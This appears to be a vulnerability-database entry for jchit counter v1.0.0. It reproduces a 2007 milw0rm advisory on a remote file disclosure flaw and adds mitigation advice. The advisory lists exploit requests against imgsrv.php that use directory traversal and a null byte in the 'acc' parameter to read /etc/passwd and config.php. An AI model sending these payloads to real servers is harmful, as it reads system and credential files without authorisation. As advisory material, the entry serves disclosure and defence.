jchit counter v1.0.0

vendor:

jchit counter

by:

Dj7xpl

N/A

CVSS

MEDIUM

Remote File Disclosure Vulnerability

CWE

Product Name: jchit counter

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The vulnerability allows an attacker to disclose local files on the server by manipulating the 'acc' parameter in the 'imgsrv.php' script. The attacker can access sensitive files such as the '/etc/passwd' file or the 'config.php' file.

Mitigation:

The vendor should implement input validation and sanitization to prevent directory traversal attacks. Additionally, sensitive files should be stored outside the web root or have proper access restrictions.

Source

Exploit-DB raw data:

                                                     Y! Underground Group
						        http://2600.ir

								
								
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......:   jchit counter v1.0.0
Download.....:   http://developers.jccorp.net
Type.........:   Remote File Disclosure Vulnerability
Author.......:   Dj7xpl / dj7xpl@2600.ir
HomePage.....:   http://Dj7xpl.2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

imgsrv.php?acc=[Local File]%00
imgsrv.php?acc=../../../../../etc/passwd%00
imgsrv.php?acc=../config.php%00

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]